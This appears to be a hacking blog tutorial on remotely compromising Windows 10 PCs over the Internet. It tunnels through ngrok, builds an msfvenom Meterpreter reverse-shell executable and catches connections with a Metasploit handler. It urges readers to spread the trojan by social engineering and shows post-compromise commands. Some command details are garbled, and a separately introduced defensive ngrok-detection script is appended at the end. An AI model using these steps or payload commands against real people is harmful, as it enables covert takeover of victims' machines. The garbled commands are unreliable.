In all previous Metasploit and Kali Linux articles, I always performed the attacks on a LAN. In this article, I will show you how to use Metasploit across the Internet, over a WAN.
A fairly common way is to forward ports on the router. Today we are going to discuss another method, which lets you run Metasploit over a WAN without port forwarding, since port forwarding is always a challenging task.
Hack Windows 10 remotely over WAN with Metasploit
Implementation steps:
- Create an account on ngrok.com.
- Download and configure Ngrok on your Kali Linux machine.
- Start the TCP or HTTP service.
- Generate payload with Msfvenom.
- Start Listener with Metasploit Framework.
- Spread your Trojan over the internet.
I will skip step 1 and step 2 because you can read through this article to do the first 2 steps.
After installing Ngrok, start the Ngrok TCP service on port 4444 by entering the command below:
./ngrok tcp 4444
You can use any port but I recommend using port 4444 for this case.
The next step is to create a malicious payload with the help of Msfvenom as follows:
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your Ngrok URL> LPORT=<Your Ngrok Port> -b “x00” -e x86/shikhata_ga_nai -f exe -o /root/Desktop/<filename>.exe
Explanation of options:
- -p stands for payload.
- -e stands for encoder.
- -o stands for output.
- -f stands for file format.
Msfvenom is a combination of Msfpayload and Msfencode, bringing both tools into a single framework instance. Msfvenom replaced both msfpayload and msfencode as of June 8, 2015.
This is a list of available platforms that one can enter using the –platform option.
- Cisco or cisco
- OSX or osx
- Solaris or solaris
- BSD or bsd
- OpenBSD or openbsd
- hardware
- Firefox or firefox
- BSDi or bsdi
- NetBSD or netbsd
- NodeJS or nodejs
- FreeBSD or freebsd
- Python or python
- AIX or aix
- JavaScript or javascript
- HPUX or hpux
- PHP or php
- Irix or irix
- Unix or unix
- Linux or linux
- Ruby or ruby
- Java or java
- Android or android
- Netware or netware
- Windows or windows
- mainframe
- multi
To see a list of all encoders, type “msfvenom -l encoders” into your terminal.
When the victim clicks on the gtavicty.exe file, the payload will be activated and will attempt to make a connection back to your system (LHOST). For a successful connection, you will need to start the multi/handler in Metasploit to receive the connection.
Start the metasploit framework by typing “msfconsole” into your terminal.
The exploit module that we will use is the multi/handler: “use exploit/multi/handler”
The payload is set with “set payload windows/meterpreter/reverse_tcp”
Here you need to set LHOST and LPORT.
set LHOST 0.0.0.0
set LPORT 4444
Just type “run” in your terminal. You can now use any social engineering method to spread your malicious executable over the Internet.
When the victim clicks on the gtavicty.exe executable, the meterpreter session will be opened immediately.
So here, ngrok will automatically forward all traffic to your localhost machine. Enter “sysinfo” to learn more about your target.
To know the process ID, just type “getpid” in the same terminal.
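Seen from the defending side, the connection back through ngrok described above starts with a DNS lookup for an ngrok tunnel hostname on the workstation. The following added example (not part of the original article) flags such lookups by unapproved processes; the record format, the sample records, the suffix list and the allowlisted path are all assumptions made for illustration.

```python
# Added example: flag DNS lookups of ngrok tunnel hostnames by unexpected processes.
# Assumption: hostname suffixes used by ngrok tunnels; adjust for your environment.
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app")
# Assumption: processes approved to use ngrok (lower-cased full paths).
ALLOWED_IMAGES = {r"c:\program files\ngrok\ngrok.exe"}

# Constructed sample records, simplified to "time|host|image|query".
SAMPLE_LOG = r"""
2024-05-01T09:14:02Z|WS-017|C:\Users\amy\Downloads\setup.exe|0.tcp.ngrok.io
2024-05-01T09:14:05Z|WS-017|C:\Program Files\Google\Chrome\chrome.exe|www.example.com
2024-05-01T09:20:41Z|DEV-03|C:\Program Files\ngrok\ngrok.exe|abc123.ngrok-free.app
2024-05-01T09:31:10Z|WS-022|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|a1b2c3.ngrok-free.app.
2024-05-01T09:33:00Z|WS-022|C:\Program Files\Google\Chrome\chrome.exe|notngrok.io
this line is malformed and must be skipped
"""


def is_tunnel_domain(name):
    """True if name is, or is a subdomain of, a listed tunnel domain."""
    name = name.strip().rstrip(".").lower()
    return any(name == s[1:] or name.endswith(s) for s in TUNNEL_SUFFIXES)


def parse_line(line):
    """Split one record into a dict; return None for malformed input."""
    parts = line.strip().split("|")
    if len(parts) != 4 or not all(parts):
        return None
    return dict(zip(("time", "host", "image", "query"), parts))


def find_suspicious(log_text):
    """Return {host: [records]} for tunnel lookups by non-approved processes."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_tunnel_domain(rec["query"]):
            continue
        if rec["image"].lower() in ALLOWED_IMAGES:
            continue
        # A "tcp" label marks a raw TCP tunnel, the kind started with "ngrok tcp".
        labels = rec["query"].lower().rstrip(".").split(".")
        rec["tcp_tunnel"] = "tcp" in labels
        hits.setdefault(rec["host"], []).append(rec)
    return hits


if __name__ == "__main__":
    for host, recs in find_suspicious(SAMPLE_LOG).items():
        for r in recs:
            print(host, r["time"], r["image"], r["query"], "tcp" if r["tcp_tunnel"] else "http")
```

In practice the records would come from endpoint DNS telemetry that includes the querying process, and a hit is a lead to investigate rather than proof of compromise.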
So that’s it then.